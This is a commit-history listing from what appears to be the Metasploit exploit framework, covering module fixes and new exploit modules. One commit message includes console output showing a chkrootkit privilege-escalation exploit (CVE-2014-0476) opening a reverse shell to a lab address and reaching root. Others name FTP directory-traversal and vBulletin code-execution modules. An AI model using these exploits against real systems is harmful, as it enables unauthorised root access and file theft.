Commit Graph

36616 Commits (58635be23716d141dd24e443bd622d77efceed25)

Author SHA1 Message Date
wchen-r7 f0da09090d
Land #6233, Konica Minolta FTP Utility 1.00 Directory Traversal 2015-11-16 13:55:29 -06:00
wchen-r7 740cacb4c0 Check nil 2015-11-16 13:54:36 -06:00
Jon Hart 902951c0ca
Clean up description; Simplify SOAP code more 2015-11-16 11:06:45 -08:00
Jon Hart 1aa1d7b5e4
Use random path for payload 2015-11-16 10:57:48 -08:00
William Vu 24c41c9261
Land #6225, wall(1)/write(1) post module 2015-11-16 12:47:35 -06:00
Jon Hart ee5d91faab
Better logging when exploit gets 401 2015-11-16 10:41:48 -08:00
Jon Hart c4ffd7ae36
When sending SOAP requests, print out proto/status/message when fail 2015-11-16 10:38:40 -08:00
David Maloney 708cbe9479
change the default SMBDomain to .
Due to a recent change using WORKGROUP
as the SMBDomain causes Trust errors.
Using '.' instead works fine.
2015-11-16 12:20:27 -06:00
David Maloney a1ab8f1dc7
added Session info display to module output
output from the mssql_local_auth_bypass module
is now prefixed with the Session id and address
of the target host so it is explicitly clear
where it is performing each action

MS-706
2015-11-16 12:13:26 -06:00
PsychoMario 2b99969f9a quote paths to allow spaces 2015-11-15 00:14:30 +00:00
PsychoMario e3f25fd6e2 Add support for specifying path, file in bourne dropper 2015-11-14 18:31:11 +00:00
scriptjunkie 06a5b5b0bd
Land #6234, Host header transport 2015-11-14 11:35:47 -06:00
Jon Hart d0c928081b
Land #6231 2015-11-13 13:30:31 -08:00
Jon Hart c914c7b22c
Completely remove SET_TIME 2015-11-13 12:28:23 -08:00
Jon Hart ab3ae675ff
Hide TIME option since SET_TIME is not implemented 2015-11-13 12:26:42 -08:00
Jon Hart ad22eb8444
More cleanup 2015-11-13 12:24:28 -08:00
m0t 504924e983 Merge pull request #5 from jhart-r7/pr/fixup-6228
Code/style cleanup for F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-13 20:23:36 +00:00
Jon Hart 045bab052e
Add configurable timeout 2015-11-13 12:18:40 -08:00
Jon Hart 6e9afc38ee
print_good when we get something 2015-11-13 12:12:37 -08:00
Jon Hart 196a88c39a
Style nit 2015-11-13 12:06:00 -08:00
Jon Hart 38ca943219
Remove unneeded width arg 2015-11-13 11:49:50 -08:00
Jon Hart e58e17450a
Simplify XML building 2015-11-13 11:36:56 -08:00
Jon Hart ecbd453301
Second pass at style cleanup. Conforms now 2015-11-13 11:24:11 -08:00
Jon Hart 85e5b0abe9
Initial style cleanup 2015-11-13 10:42:26 -08:00
Jon Hart 4a707b33a2
Add rspec coverage for cowsay. Achievement unlocked 2015-11-13 10:26:47 -08:00
Jon Hart 4604f8cd83
Move cowsay to Rex::Text so that everyone can enjoy it ;) 2015-11-13 08:57:48 -08:00
William Vu 4401c6f1fd
Land #6178, rsync modules_list improvements 2015-11-13 10:46:24 -06:00
sammbertram cd4aa28d11 Transport priority changes
Pass in the "lhost" and "lport" options to the default transport during the native payload. This takes the following LHOST priorities:
1. OverrideLHOST, only if OverrideRequestHost is TRUE
2. The request Host: header.
3. The LHOST datastore.
2015-11-13 13:21:46 +00:00
sammbertram 9d9865150b Transport priority changes
Default transport request should set the priority to the Host: request header, and the subsequent OverrideRequestHost, OverrideLHOST, and OverrideLPORT options in the handler for reverse_http(s).
2015-11-13 13:19:01 +00:00
jvoisin 873994a154 Skip the explicit return
Thanks to kernelsmith for the feedback
2015-11-13 12:40:34 +01:00
JT 44948a2ace Add konica_ftp_traversal.rb ( CVE-2015-7603 )
This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//
2015-11-13 07:51:42 +08:00
Louis Sato 9a0f0a7843
Land #6142, uptime refactor 2015-11-12 16:58:55 -06:00
wchen-r7 0e121df69d Need a default template
The set_template_default actually needs the second argument,
otherwise we hit a RuntimeError.
2015-11-12 15:17:03 -06:00
wchen-r7 aaea730508 Fix #6213 - Method to_linux_x86_elf fails to set set :template
:template by default is just the base name of the file, not the
fullname. Before we use it, we need to normalize it. Methods
in this class rely on set_template_default for normalization (
which can also handle a custom path), so we'll just use that too.

Fix #6213
2015-11-12 15:07:58 -06:00
wchen-r7 ee25cb88b5
Land #6196, vBulletin 5.1.2 Unserialize Code Execution 2015-11-12 14:38:39 -06:00
wchen-r7 6077617bfd rm res var name
the res variable isn't used
2015-11-12 14:37:47 -06:00
wchen-r7 199ed9ed25 Move vbulletin_unserialize.rb to exploits/multi/http/
According to @all3g, this works on Windows too, so we will move
this to multi/http.
2015-11-12 14:36:01 -06:00
jvoisin 3566b978c3 Add a module for a chkrootkit-powered privsec
This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.

Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.

How to reproduce:

1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
2015-11-12 19:30:05 +01:00
m0t eae2d6c89d F5 module 2015-11-12 09:51:09 +00:00
scriptjunkie 8703987535 Add HTTPS and new transport support for hop 2015-11-11 21:25:23 -06:00
William Vu e8dacf32fd
Land #6182, Heartbleed scanner improvements 2015-11-11 16:59:20 -06:00
William Vu ce3f9e2fab Fix minor style issues 2015-11-11 16:58:20 -06:00
Brent Cook a2fe2fbd5e
Land #6214, #6060, simplify framework gem layout and version scheme
This merges things up and removes duplicate gemspecs so we can easily make
framework gem releases for embedding in 3rd-party projects.
2015-11-11 15:04:21 -06:00
Brent Cook 1b951b36fe remove -db / -pcap / -all gemspecs, merge into one 2015-11-11 15:01:50 -06:00
Jon Hart 15cfa925c8
Document the cloud mess 2015-11-11 12:06:53 -08:00
Jon Hart a328675f77
Add simulated cowsay support to wall 2015-11-11 11:54:46 -08:00
wchen-r7 99607e6e4d
Land #6205, BisonWare BisonFTP Server Directory Traversal
CVE-2015-7602
2015-11-11 11:47:45 -06:00
wchen-r7 40bdd2bd01 Do module cleanup for auxiliary/scanner/ftp/bison_ftp_traversal 2015-11-11 11:46:37 -06:00
Jon Hart 8d21a91f3e
Add initial wall module 2015-11-11 09:15:32 -08:00
wchen-r7 c79a66be02
Land #6204, directory traversal for PCMan FTP server
CVE-2015-7601
2015-11-11 11:07:34 -06:00